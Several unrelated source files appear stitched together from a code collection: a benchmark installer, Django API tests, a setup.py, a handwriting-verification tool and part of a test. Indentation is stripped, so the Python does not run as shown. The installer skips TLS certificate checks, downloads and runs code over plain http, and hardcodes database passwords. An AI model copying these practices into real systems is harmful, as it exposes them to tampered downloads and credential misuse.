self.__run_command("sudo cp -r /usr/lib/jvm/java-1.7.0-openjdk-amd64/include /usr/lib/jvm/java-1.7.0-openjdk-amd64/jre/bin/")
self.__download("http://www.caucho.com/download/resin-4.0.36.tar.gz")
self.__run_command("tar xzf resin-4.0.36.tar.gz")
self.__run_command("./configure --prefix=`pwd`", cwd="resin-4.0.36")
self.__run_command("make", cwd="resin-4.0.36")
self.__run_command("make install", cwd="resin-4.0.36")
self.__run_command("mv conf/resin.properties conf/resin.properties.orig", cwd="resin-4.0.36")
self.__run_command("cat ../config/resin.properties > resin-4.0.36/conf/resin.properties")
self.__run_command("mv conf/resin.xml conf/resin.xml.orig", cwd="resin-4.0.36")
self.__run_command("cat ../config/resin.xml > resin-4.0.36/conf/resin.xml")
##############################################################
# Frameworks
##############################################################
#
# Grails
#
self.__download("http://dist.springframework.org.s3.amazonaws.com/release/GRAILS/grails-2.3.3.zip")
self.__run_command("unzip -o grails-2.3.3.zip")
self.__run_command("rm grails-2.3.3.zip")
#
# Play 2
#
self.__download("http://downloads.typesafe.com/play/2.2.0/play-2.2.0.zip")
self.__run_command("unzip -o play-2.2.0.zip")
self.__run_command("rm play-2.2.0.zip")
#
# Play 1
#
self.__download("http://downloads.typesafe.com/releases/play-1.2.5.zip")
self.__run_command("unzip -o play-1.2.5.zip")
self.__run_command("rm play-1.2.5.zip")
self.__run_command("mv play-1.2.5/play play-1.2.5/play1")
# siena
self.__run_command("yes | play-1.2.5/play1 install siena")
#
# TreeFrog Framework
#
self.__run_command("sudo apt-get install qt4-qmake libqt4-dev libqt4-sql-mysql g++", True)
self.__download("http://downloads.sourceforge.net/project/treefrog/src/treefrog-1.7.4.tar.gz")
self.__run_command("tar xzf treefrog-1.7.4.tar.gz")
self.__run_command("rm treefrog-1.7.4.tar.gz")
self.__run_command("./configure", cwd="treefrog-1.7.4")
self.__run_command("make", cwd="treefrog-1.7.4/src")
self.__run_command("sudo make install", cwd="treefrog-1.7.4/src")
self.__run_command("make", cwd="treefrog-1.7.4/tools")
self.__run_command("sudo make install", cwd="treefrog-1.7.4/tools")
#
# Vert.x
#
self.__download("http://dl.bintray.com/vertx/downloads/vert.x-2.1M2.tar.gz?direct=true", "vert.x-2.1M2.tar.gz")
self.__run_command("tar xzf vert.x-2.1M2.tar.gz")
#
# Yesod
#
self.__run_command("cabal update", retry=True)
self.__run_command("cabal install yesod persistent-mysql", retry=True)
#
# Jester
#
self.__run_command("git clone git://github.com/dom96/jester.git jester/jester", retry=True)
print("\nINSTALL: Finished installing server software\n")
############################################################
# End __install_server_software
############################################################
def _install_python(self):
# .profile is not loaded yet. So we should use full path.
pypy_bin = "~/FrameworkBenchmarks/installs/pypy/bin"
python_bin = "~/FrameworkBenchmarks/installs/py2/bin"
python3_bin= "~/FrameworkBenchmarks/installs/py3/bin"
def easy_install(pkg, two=True, three=False, pypy=False):
cmd = "/easy_install -ZU '" + pkg + "'"
if two: self.__run_command(python_bin + cmd, retry=True)
if three: self.__run_command(python3_bin + cmd, retry=True)
if pypy: self.__run_command(pypy_bin + cmd, retry=True)
self.__download("https://bitbucket.org/pypy/pypy/downloads/pypy-2.2-linux64.tar.bz2")
self.__run_command("tar xjf pypy-2.2-linux64.tar.bz2")
self.__run_command('ln -sf pypy-2.2-linux64 pypy')
self.__download("http://www.python.org/ftp/python/2.7.6/Python-2.7.6.tgz")
self.__run_command("tar xzf Python-2.7.6.tgz")
self.__download("http://www.python.org/ftp/python/3.3.2/Python-3.3.2.tar.xz")
self.__run_command("tar xJf Python-3.3.2.tar.xz")
self.__run_command("./configure --prefix=$HOME/FrameworkBenchmarks/installs/py2 --disable-shared CC=gcc-4.8", cwd="Python-2.7.6")
self.__run_command("./configure --prefix=$HOME/FrameworkBenchmarks/installs/py3 --disable-shared CC=gcc-4.8", cwd="Python-3.3.2")
self.__run_command("make -j2", cwd="Python-2.7.6")
self.__run_command("make install", cwd="Python-2.7.6")
self.__run_command("make -j2", cwd="Python-3.3.2")
self.__run_command("make install", cwd="Python-3.3.2")
self.__download("https://bitbucket.org/pypa/setuptools/downloads/ez_setup.py")
self.__run_command(pypy_bin + "/pypy ez_setup.py")
self.__run_command(python_bin + "/python ez_setup.py")
self.__run_command(python3_bin + "/python3 ez_setup.py")
easy_install('pip==1.4.1', two=True, three=True, pypy=True)
easy_install('MySQL-python==1.2.4', two=True, three=False, pypy=True)
easy_install('https://github.com/clelland/MySQL-for-Python-3/archive/master.zip', two=False, three=True, pypy=False)
easy_install('PyMySQL==0.6.1', two=True, three=True, pypy=True)
easy_install('psycopg2==2.5.1', three=True)
easy_install('simplejson==3.3.1', two=True, three=True, pypy=False)
easy_install('ujson==1.33', three=True)
easy_install('gevent==1.0')
easy_install('uwsgi', three=True) # uwsgi is released too often to stick on single version.
# Gunicorn
easy_install('gunicorn==18', two=True, three=True, pypy=True)
# meinheld HEAD supports gunicorn worker on Python 3
easy_install('https://github.com/mopemope/meinheld/archive/master.zip', two=True, three=True, pypy=True)
# Tornado
easy_install('tornado==3.1', two=True, three=True, pypy=True)
easy_install('motor==0.1.2', two=True, three=True, pypy=True)
easy_install('pymongo==2.5.2', two=True, three=True, pypy=True)
# Django
easy_install("https://www.djangoproject.com/download/1.6/tarball/", two=True, three=True, pypy=True)
# Flask
easy_install('Werkzeug==0.9.4', two=True, three=True, pypy=True)
easy_install('flask==0.10.1', two=True, three=True, pypy=True)
easy_install('sqlalchemy==0.8.3', two=True, three=False, pypy=True)
# SQLAlchemy 0.9 supports C extension for Python 3
easy_install('https://bitbucket.org/zzzeek/sqlalchemy/downloads/SQLAlchemy-0.9.0b1.tar.gz', two=False, three=True)
easy_install('Jinja2==2.7.1', two=True, three=True, pypy=True)
easy_install('Flask-SQLAlchemy==1.0', two=True, three=True, pypy=True)
# Bottle
easy_install('bottle==0.11.6', two=True, three=True, pypy=True)
easy_install('bottle-sqlalchemy==0.4', two=True, three=True, pypy=True)
# Falcon
easy_install('Cython==0.19.2', two=True, three=True, pypy=True)
easy_install('falcon==0.1.7', two=True, three=True, pypy=True)
############################################################
# __install_error
############################################################
def __install_error(self, message):
print("\nINSTALL ERROR: %s\n" % message)
if self.benchmarker.install_error_action == 'abort':
sys.exit("Installation aborted.")
############################################################
# End __install_error
############################################################
############################################################
# __install_database_software
############################################################
def __install_database_software(self):
print("\nINSTALL: Installing database software\n")
self.__run_command("cd .. && " + self.benchmarker.database_sftp_string(batch_file="config/database_sftp_batch"), True)
remote_script = """
##############################
# Prerequisites
##############################
yes | sudo apt-get update
yes | sudo apt-get install build-essential git libev-dev libpq-dev libreadline6-dev postgresql
sudo sh -c "echo '* - nofile 65535' >> /etc/security/limits.conf"
sudo mkdir -p /ssd
sudo mkdir -p /ssd/log
##############################
# MySQL
##############################
sudo sh -c "echo mysql-server mysql-server/root_password_again select secret | debconf-set-selections"
sudo sh -c "echo mysql-server mysql-server/root_password select secret | debconf-set-selections"
yes | sudo apt-get install mysql-server
sudo stop mysql
# use the my.cnf file to overwrite /etc/mysql/my.cnf
sudo mv /etc/mysql/my.cnf /etc/mysql/my.cnf.orig
sudo mv my.cnf /etc/mysql/my.cnf
sudo cp -R -p /var/lib/mysql /ssd/
sudo cp -R -p /var/log/mysql /ssd/log
sudo cp usr.sbin.mysqld /etc/apparmor.d/
sudo /etc/init.d/apparmor reload
sudo start mysql
# Insert data
mysql -uroot -psecret < create.sql
##############################
# Postgres
##############################
sudo useradd benchmarkdbuser -p benchmarkdbpass
sudo -u postgres psql template1 < create-postgres-database.sql
sudo -u benchmarkdbuser psql hello_world < create-postgres.sql
sudo -u benchmarkdbuser psql hello_world < create-postgres-urweb.sql
sudo -u postgres -H /etc/init.d/postgresql stop
sudo mv postgresql.conf /etc/postgresql/9.1/main/postgresql.conf
sudo mv pg_hba.conf /etc/postgresql/9.1/main/pg_hba.conf
sudo cp -R -p /var/lib/postgresql/9.1/main /ssd/postgresql
sudo -u postgres -H /etc/init.d/postgresql start
sudo mv 60-postgresql-shm.conf /etc/sysctl.d/60-postgresql-shm.conf
##############################
# MongoDB
##############################
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10
sudo cp 10gen.list /etc/apt/sources.list.d/10gen.list
sudo apt-get update
yes | sudo apt-get remove mongodb-clients
yes | sudo apt-get install mongodb-10gen
sudo stop mongodb
sudo mv /etc/mongodb.conf /etc/mongodb.conf.orig
sudo mv mongodb.conf /etc/mongodb.conf
sudo cp -R -p /var/lib/mongodb /ssd/
sudo cp -R -p /var/log/mongodb /ssd/log/
sudo start mongodb
"""
print("\nINSTALL: %s" % self.benchmarker.database_ssh_string)
p = subprocess.Popen(self.benchmarker.database_ssh_string.split(" "), stdin=subprocess.PIPE)
p.communicate(remote_script)
returncode = p.returncode
if returncode != 0:
self.__install_error("status code %s running subprocess '%s'." % (returncode, self.benchmarker.database_ssh_string))
print("\nINSTALL: Finished installing database software\n")
############################################################
# End __install_database_software
############################################################
############################################################
# __install_client_software
############################################################
def __install_client_software(self):
print("\nINSTALL: Installing client software\n")
remote_script = """
##############################
# Prerequisites
##############################
yes | sudo apt-get update
yes | sudo apt-get install build-essential git libev-dev libpq-dev libreadline6-dev postgresql
sudo sh -c "echo '* - nofile 65535' >> /etc/security/limits.conf"
sudo mkdir -p /ssd
sudo mkdir -p /ssd/log
##############################
# wrk
##############################
git clone https://github.com/wg/wrk.git
cd wrk
make
sudo cp wrk /usr/local/bin
cd ~
git clone https://github.com/wg/wrk.git wrk-pipeline
cd wrk-pipeline
git checkout pipeline
make
sudo cp wrk /usr/local/bin/wrk-pipeline
cd ~
"""
print("\nINSTALL: %s" % self.benchmarker.client_ssh_string)
p = subprocess.Popen(self.benchmarker.client_ssh_string.split(" "), stdin=subprocess.PIPE)
p.communicate(remote_script)
returncode = p.returncode
if returncode != 0:
self.__install_error("status code %s running subprocess '%s'." % (returncode, self.benchmarker.client_ssh_string))
print("\nINSTALL: Finished installing client software\n")
############################################################
# End __install_client_software
############################################################
############################################################
# __run_command
############################################################
def __run_command(self, command, send_yes=False, cwd=None, retry=False):
try:
cwd = os.path.join(self.install_dir, cwd)
except AttributeError:
cwd = self.install_dir
if retry:
max_attempts = 5
else:
max_attempts = 1
attempt = 1
delay = 0
print("\nINSTALL: %s (cwd=%s)" % (command, cwd))
while True:
error_message = ""
try:
# Execute command.
if send_yes:
process = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, cwd=cwd)
process.communicate("yes")
returncode = process.returncode
if returncode:
raise subprocess.CalledProcessError(returncode, command)
else:
subprocess.check_call(command, shell=True, cwd=cwd)
break # Exit loop if successful.
except:
exceptionType, exceptionValue, exceptionTraceBack = sys.exc_info()
error_message = "".join(traceback.format_exception_only(exceptionType, exceptionValue))
print error_message
# Exit if there are no more attempts left.
attempt += 1
if attempt > max_attempts:
break
# Delay before next attempt.
if delay == 0:
delay = 5
else:
delay = delay * 2
print("Attempt %s/%s starting in %s seconds." % (attempt, max_attempts, delay))
time.sleep(delay)
if error_message:
self.__install_error(error_message)
############################################################
# End __run_command
############################################################
############################################################
# __bash_from_string
# Runs bash -c "command" in install_dir.
############################################################
def __bash_from_string(self, command):
self.__run_command('bash -c "%s"' % command)
############################################################
# End __bash_from_string
############################################################
############################################################
# __download
# Downloads a file from a URI.
############################################################
def __download(self, uri, filename=""):
if filename:
filename_option = "-O %s " % filename
else:
filename_option = ""
command = "wget -nv --no-check-certificate --trust-server-names %s%s" % (filename_option, uri)
self.__run_command(command, retry=True)
############################################################
# End __download
############################################################
############################################################
# __init__(benchmarker)
############################################################
def __init__(self, benchmarker):
self.benchmarker = benchmarker
self.install_dir = "installs"
try:
os.mkdir(self.install_dir)
except OSError:
pass
############################################################
# End __init__
############################################################
# vim: sw=2
| bsd-3-clause | 2,867,191,256,785,626,600 | 39.38141 | 575 | 0.567743 | false |
bdang2012/taiga-back-casting | tests/integration/test_userstorage_api.py | 1 | 7073 | # Copyright (C) 2014-2015 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2015 Jesús Espino <[email protected]>
# Copyright (C) 2014-2015 David Barragán <[email protected]>
# Copyright (C) 2014-2015 Anler Hernández <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pytest
from django.core.urlresolvers import reverse
from .. import factories
from taiga.base.utils import json
pytestmark = pytest.mark.django_db
def test_list_userstorage(client):
user1 = factories.UserFactory()
user2 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
factories.StorageEntryFactory(owner=user1)
storage13 = factories.StorageEntryFactory(owner=user1)
factories.StorageEntryFactory(owner=user2)
# List by anonumous user
response = client.json.get(reverse("user-storage-list"))
assert response.status_code == 200
assert len(response.data) == 0
# List own entries
client.login(username=user1.username, password=user1.username)
response = client.json.get(reverse("user-storage-list"))
assert response.status_code == 200
assert len(response.data) == 3
client.login(username=user2.username, password=user2.username)
response = client.json.get(reverse("user-storage-list"))
assert response.status_code == 200
assert len(response.data) == 1
# Filter results by key
client.login(username=user1.username, password=user1.username)
keys = ",".join([storage11.key, storage13.key])
url = "{}?keys={}".format(reverse("user-storage-list"), keys)
response = client.json.get(url)
assert response.status_code == 200
assert len(response.data) == 2
def test_view_storage_entries(client):
user1 = factories.UserFactory()
user2 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
# Get by anonymous user
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
# Get single entry
client.login(username=user1.username, password=user1.username)
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 200
assert response.data["key"] == storage11.key
assert response.data["value"] == storage11.value
# Get not existent key
client.login(username=user2.username, password=user2.username)
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
response = client.json.get(reverse("user-storage-detail", args=["foobar"]))
assert response.status_code == 404
def test_create_entries(client):
user1 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
form = {"key": "foo",
"value": {"bar": "bar"}}
form_without_key = {"value": {"bar": "bar"}}
form_without_value = {"key": "foo"}
error_form = {"key": storage11.key,
"value": {"bar": "bar"}}
# Create entry by anonymous user
response = client.json.post(reverse("user-storage-list"), json.dumps(form))
assert response.status_code == 401
# Create by logged user
client.login(username=user1.username, password=user1.username)
response = client.json.post(reverse("user-storage-list"), json.dumps(form))
assert response.status_code == 201
response = client.json.get(reverse("user-storage-detail", args=[form["key"]]))
assert response.status_code == 200
# Wrong data
client.login(username=user1.username, password=user1.username)
response = client.json.post(reverse("user-storage-list"), json.dumps(form_without_key))
assert response.status_code == 400
response = client.json.post(reverse("user-storage-list"), json.dumps(form_without_value))
assert response.status_code == 400
response = client.json.post(reverse("user-storage-list"), json.dumps(error_form))
assert response.status_code == 400
def test_update_entries(client):
user1 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
# Update by anonymous user
form = {"value": "bar", "key": storage11.key}
response = client.json.put(reverse("user-storage-detail", args=[storage11.key]),
json.dumps(form))
assert response.status_code == 401
# Update by logged user
client.login(username=user1.username, password=user1.username)
form = {"value": {"bar": "bar"}, "key": storage11.key}
response = client.json.put(reverse("user-storage-detail", args=[storage11.key]),
json.dumps(form))
assert response.status_code == 200
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 200
assert response.data["value"] == form["value"]
# Update not existing entry
form = {"value": {"bar": "bar"}, "key": "foo"}
response = client.json.get(reverse("user-storage-detail", args=[form["key"]]))
assert response.status_code == 404
response = client.json.put(reverse("user-storage-detail", args=[form["key"]]),
json.dumps(form))
assert response.status_code == 201
response = client.json.get(reverse("user-storage-detail", args=[form["key"]]))
assert response.status_code == 200
assert response.data["value"] == form["value"]
def test_delete_storage_entry(client):
user1 = factories.UserFactory()
user2 = factories.UserFactory()
storage11 = factories.StorageEntryFactory(owner=user1)
# Delete by anonumous user
response = client.json.delete(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 401
# Delete by logged user
client.login(username=user1.username, password=user1.username)
response = client.json.delete(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 204
response = client.json.get(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
# Delete not existent entry
response = client.json.delete(reverse("user-storage-detail", args=["foo"]))
assert response.status_code == 404
client.login(username=user2.username, password=user2.username)
response = client.json.delete(reverse("user-storage-detail", args=[storage11.key]))
assert response.status_code == 404
| agpl-3.0 | 6,088,007,013,867,954,000 | 39.4 | 93 | 0.695757 | false |
glomex/gcdt-lookups | setup.py | 1 | 1606 | from setuptools import setup, find_packages
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the README file
try:
import pypandoc
long_description = pypandoc.convert('README.md', format='md', to='rst')
except(IOError, ImportError):
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if ('git+' not in x) and
(not x.startswith('#')) and (not x.startswith('-'))]
dependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' not in x]
setup(
name='gcdt-lookups',
version='0.0.26',
description='Plugin (gcdt-lookups) for gcdt',
long_description=long_description,
license='MIT',
classifiers=[
'Natural Language :: English',
'Intended Audience :: Developers',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
],
keywords='',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='glomex SRE Team',
install_requires=install_requires,
dependency_links=dependency_links,
author_email='[email protected]',
entry_points={
'gcdt10': [
'lookups=gcdt_lookups.lookups',
],
}
)
| mit | -4,124,764,179,536,673,000 | 31.12 | 87 | 0.627024 | false |
bdzimmer/handwriting | handwriting/verify.py | 1 | 13242 | # -*- coding: utf-8 -*-
"""
Interactively verify predictions from algorithms so they can be used as ground
truth for evaluation or training.
"""
# Copyright (c) 2017 Ben Zimmer. All rights reserved.
# New process that uses mutable tree of Samples.
import os
import sys
import cv2
import numpy as np
from handwriting import analysisimage, annotate, driver
from handwriting import findletters, charclass, improc, util
from handwriting.prediction import Sample
def int_safe(obj, default=0):
"""safely convert something to an integer"""
try:
obj_int = int(obj)
except ValueError:
obj_int = default
return obj_int
def _image_idx(x_val, widths, hgap):
"""find the index of an image given a position, image widths, and a
horizontal gap size"""
widths = [x + hgap for x in widths]
widths_cumsum = np.cumsum([0] + widths)
return np.where(x_val >= widths_cumsum)[0][-1]
def _mutate_set_verify_recursive(sample, verified):
"""recursively set a hierarchy of samples as verified or unverified"""
sample.verified = verified
if isinstance(sample.result, Sample):
_mutate_set_verify_recursive(sample.result, verified)
elif isinstance(sample.result, list):
for samp in sample.result:
_mutate_set_verify_recursive(samp, verified)
def _verification_status_recursive(sample, verified=0, total=0):
"""recursively determine how much of the sample has been verified"""
total = total + 1
if sample.verified:
verified = verified + 1
if isinstance(sample.result, Sample):
verified, total = _verification_status_recursive(
sample.result, verified, total)
elif isinstance(sample.result, list):
for samp in sample.result:
verified, total = _verification_status_recursive(
samp, verified, total)
return verified, total
def _mutate_recalculate_list(
list_update, new_items, compare_func, calc_func):
"""update samples in a list, recalculating items that have changed"""
# list_update is a list of Samples
# new_items are not samples; calc_func will take one of these and return
# a Sample
res = []
for item in new_items:
found = False
for old_item in list_update:
if compare_func(item, old_item.data):
print(old_item.data)
# y.verified = True
res.append(old_item)
found = True
break
if not found:
print("recalculating", item)
sample = calc_func(item)
# sample.verified = True
res.append(sample)
print("done updating list")
list_update[:] = res
def _mutate_verify_line_poss(image_sample, process_line_position):
"""verify positions of lines"""
print("Verify the positions of the lines.")
print("left mouse button: create a new line with two clicks")
print("right mouse button: delete the nearest line")
print("escape: done")
print()
lines = [x.data for x in image_sample.result]
lines_verified = annotate.annotate_lines(image_sample.data, lines)
# update what's been modified in the hierarchy
calc_func = lambda x: process_line_position(x, image_sample.data)
_mutate_recalculate_list(
image_sample.result, lines_verified, np.allclose, calc_func)
image_sample.verified = True
for samp in image_sample.result: # verify line position samples
samp.verified = True
def _mutate_verify_multi(
line_image_sample,
process_word_position,
process_char_position,
new_char_annotation_mode):
"""open different annotation options depending on click location
in line analysis image"""
window_title = "line analysis"
def draw():
"""refresh the view"""
lai = analysisimage.LineAnalysisImage(line_image_sample)
cv2.imshow(window_title, lai.image)
def on_mouse(event, mouse_x, mouse_y, flags, params):
"""helper"""
if event == cv2.EVENT_LBUTTONDOWN:
print(mouse_x, mouse_y, "left")
lai = analysisimage.LineAnalysisImage(line_image_sample)
if mouse_y >= lai.line_y_start and mouse_y < lai.line_y_end:
print("line")
print("Verify the positions of the words.")
print("left mouse button: create a new word with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
word_positions = [x.data for x in line_image_sample.result]
words_verified = annotate.annotate_word_positions(
line_image_sample.data, word_positions)
calc_func = lambda x: process_word_position(x, line_image_sample.data)
_mutate_recalculate_list(
line_image_sample.result, words_verified, np.allclose, calc_func)
line_image_sample.verified = True
for samp in line_image_sample.result: # verify word position samples
samp.verified = True
draw()
elif mouse_y >= lai.words_y_start and mouse_y < lai.words_y_end:
print("words")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_words_im_x,
[word_pos.data[1] - word_pos.data[0] for word_pos in word_positions],
analysisimage.HGAP_LARGE)
# TODO: work with word image sample instead
word_position_sample = word_positions[idx]
char_positions = [x.data for x in word_position_sample.result.result]
print("char positions:", char_positions)
if new_char_annotation_mode:
print("Verify the positions of the characters.")
print("left mouse button: create a new character with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
char_positions_verified = annotate.annotate_word_positions(
word_position_sample.result.data,
char_positions)
else:
print("Verify the positions of gaps between letters.")
print("left mouse button: create a new gap")
print("right mouse button: delete the nearest gap")
print("escape: done")
print()
char_gaps = findletters.positions_to_gaps(char_positions)
char_gaps_verified = annotate.annotate_letter_gaps(
word_position_sample.result.data,
char_gaps)
char_positions_verified = findletters.gaps_to_positions(char_gaps_verified)
print("char positions verified:", char_positions_verified)
calc_func = lambda x: process_char_position(x, word_position_sample.result.data)
_mutate_recalculate_list(
word_position_sample.result.result, char_positions_verified,
np.allclose, calc_func)
word_position_sample.result.verified = True # verify word image sample
for samp in word_position_sample.result.result: # verify char position samples
samp.verified = True
draw()
elif mouse_y >= lai.char_ims_y_start and mouse_y < lai.char_ims_y_end:
# verify character labels by word
print("char ims")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_char_ims_im_x,
[np.sum([char_pos.data[1] - char_pos.data[0] + analysisimage.HGAP_SMALL
for char_pos in word_pos.result.result]) - analysisimage.HGAP_SMALL
for word_pos in word_positions],
analysisimage.HGAP_LARGE)
patch_width = 96
patch_height = 96
pad = lambda x: improc.pad_image(x, patch_width, patch_height)
# TODO: most of this logic is to deal with the charclass interface
def pad_preds(preds):
"""helper"""
return [p.copy(data=(pad(p.data), None, p.data)) for p in preds]
def unpad_preds(preds):
"""helper"""
return [p.copy(data=(p.data[2], p.data[1])) for p in preds]
while idx < len(word_positions):
char_img_samples = [char_pos.result
for char_pos in word_positions[idx].result.result]
chars_working, chars_done = charclass.label_chars(pad_preds(char_img_samples))
# this is a bit of a hack, but it works well for now.
print(len(chars_working), len(chars_done))
if len(chars_done) == 0:
break
char_img_samples_verified = unpad_preds(chars_working) + unpad_preds(chars_done)
for org_sample, new_sample in zip(char_img_samples, char_img_samples_verified):
org_sample.result = new_sample.result
org_sample.verified = new_sample.verified
draw()
idx = idx + 1
elif mouse_y >= lai.chars_y_start and mouse_y < lai.chars_y_end:
print("chars")
cv2.waitKey(1)
if event == cv2.EVENT_RBUTTONDOWN:
print(mouse_x, mouse_y, "right")
cv2.waitKey(1)
cv2.namedWindow(window_title, cv2.WINDOW_NORMAL)
cv2.setMouseCallback(window_title, on_mouse, 0)
draw()
while True:
key = cv2.waitKey(0)
if key == 27:
break
if key == 13:
_mutate_set_verify_recursive(line_image_sample, True)
if key == 8:
_mutate_set_verify_recursive(line_image_sample, False)
draw()
cv2.destroyWindow(window_title)
def main(argv):
"""main program"""
if len(argv) < 3:
print("Usage: verify input_file <line | multi | view>")
sys.exit()
input_filename = argv[1]
verify_type = argv[2]
new_char_annotation_mode = False
# filename has a number version suffix
sample_filename = input_filename + ".sample.pkl"
sample_dirname, sample_basename = os.path.split(sample_filename)
possible_files = [x for x in os.listdir(sample_dirname)
if x.startswith(sample_basename)]
versions = [int_safe(x.split(".")[-1]) for x in possible_files]
latest_idx = np.argmax(versions)
latest_version = versions[latest_idx]
latest_filename = possible_files[latest_idx]
sample_filename_full = os.path.join(sample_dirname, latest_filename)
print("loading sample file:", sample_filename_full)
image_sample = util.load(sample_filename_full)
# with open(sample_filename_full, "rb") as sample_file:
# image_sample = pickle.load(sample_file)
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
(process_image,
process_line_position,
process_word_position,
process_char_position) = driver.current_best_process()
if verify_type == "line":
_mutate_verify_line_poss(image_sample, process_line_position)
elif verify_type == "view":
for line_pos in image_sample.result:
img = analysisimage.LineAnalysisImage(line_pos.result).image
cv2.namedWindow("line analysis", cv2.WINDOW_NORMAL)
cv2.imshow("line analysis", img)
cv2.waitKey()
else:
if len(argv) > 3:
start_idx = int(argv[3]) - 1
else:
start_idx = 0
for idx in range(start_idx, len(image_sample.result)):
line_pos = image_sample.result[idx]
print("editing line " + str(idx + 1) + " / " + str(len(image_sample.result)))
_mutate_verify_multi(
line_pos.result,
process_word_position, process_char_position,
new_char_annotation_mode)
if verify_type != "view":
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
sample_filename_full = sample_filename + "." + str(latest_version + 1)
print("writing sample file:", sample_filename_full)
util.save(image_sample, sample_filename_full)
# with open(sample_filename_full, "wb") as sample_file:
# pickle.dump(image_sample, sample_file)
if __name__ == "__main__":
main(sys.argv)
| bsd-3-clause | 6,504,261,244,183,423,000 | 37.606414 | 100 | 0.576801 | false |
yw374cornell/e-mission-server | emission/tests/netTests/TestBuiltinUserCacheHandlerOutput.py | 1 | 7090 | # Standard imports
import unittest
import datetime as pydt
import logging
import json
import uuid
import attrdict as ad
import time
import geojson as gj
import arrow
# Our imports
import emission.tests.common
import emission.core.get_database as edb
import emission.net.usercache.abstract_usercache as enua
import emission.storage.timeseries.abstract_timeseries as esta
import emission.net.usercache.abstract_usercache_handler as enuah
import emission.net.api.usercache as mauc
import emission.core.wrapper.trip as ecwt
import emission.storage.decorations.local_date_queries as ecsdlq
# These are the current formatters, so they are included here for testing.
# However, it is unclear whether or not we need to add other tests as we add other formatters,
# specially if they follow the same pattern.
class TestBuiltinUserCacheHandlerOutput(unittest.TestCase):
def setUp(self):
emission.tests.common.dropAllCollections(edb.get_db())
self.testUserUUID1 = uuid.uuid4()
self.testUserUUID2 = uuid.uuid4()
self.testUserUUIDios = uuid.uuid4()
self.activity_entry = json.load(open("emission/tests/data/netTests/android.activity.txt"))
self.location_entry = json.load(open("emission/tests/data/netTests/android.location.raw.txt"))
self.transition_entry = json.load(open("emission/tests/data/netTests/android.transition.txt"))
self.entry_list = [self.activity_entry, self.location_entry, self.transition_entry]
self.uc1 = enua.UserCache.getUserCache(self.testUserUUID1)
self.uc2 = enua.UserCache.getUserCache(self.testUserUUID2)
self.ucios = enua.UserCache.getUserCache(self.testUserUUIDios)
self.ts1 = esta.TimeSeries.get_time_series(self.testUserUUID1)
self.ts2 = esta.TimeSeries.get_time_series(self.testUserUUID2)
self.tsios = esta.TimeSeries.get_time_series(self.testUserUUIDios)
for entry in self.entry_list:
# Needed because otherwise we get a DuplicateKeyError while
# inserting the mutiple copies
del entry["_id"]
self.curr_ts = int(time.time())
for offset in range(self.curr_ts - 5 * 60, self.curr_ts, 30):
for entry in self.entry_list:
entry["metadata"]["write_ts"] = offset * 1000
mauc.sync_phone_to_server(self.testUserUUID1, self.entry_list)
for offset in range(self.curr_ts - 7 * 60 + 1, self.curr_ts - 2 * 60 + 1, 30):
for entry in self.entry_list:
entry["metadata"]["write_ts"] = offset * 1000
mauc.sync_phone_to_server(self.testUserUUID2, self.entry_list)
self.ios_activity_entry = json.load(open("emission/tests/data/netTests/ios.activity.txt"))
self.ios_location_entry = json.load(open("emission/tests/data/netTests/ios.location.txt"))
self.ios_transition_entry = json.load(open("emission/tests/data/netTests/ios.transition.txt"))
self.ios_entry_list = [self.ios_activity_entry, self.ios_location_entry, self.ios_transition_entry]
for entry in self.ios_entry_list:
# Needed because otherwise we get a DuplicateKeyError while
# inserting the mutiple copies
del entry["_id"]
for offset in range(self.curr_ts - 5 * 60, self.curr_ts, 30):
for entry in self.ios_entry_list:
entry["metadata"]["write_ts"] = offset
mauc.sync_phone_to_server(self.testUserUUIDios, self.ios_entry_list)
# The first query for every platform is likely to work
# because startTs = None and endTs, at least for iOS, is way out there
# But on the next call, if we are multiplying by 1000, it won't work any more.
# Let's add a new test for this
def testGetLocalDay(self):
adt = arrow.get(pydt.datetime(2016, 1, 1, 9, 46, 0, 0))
test_dt = ecsdlq.get_local_date(adt.timestamp, "America/Los_Angeles")
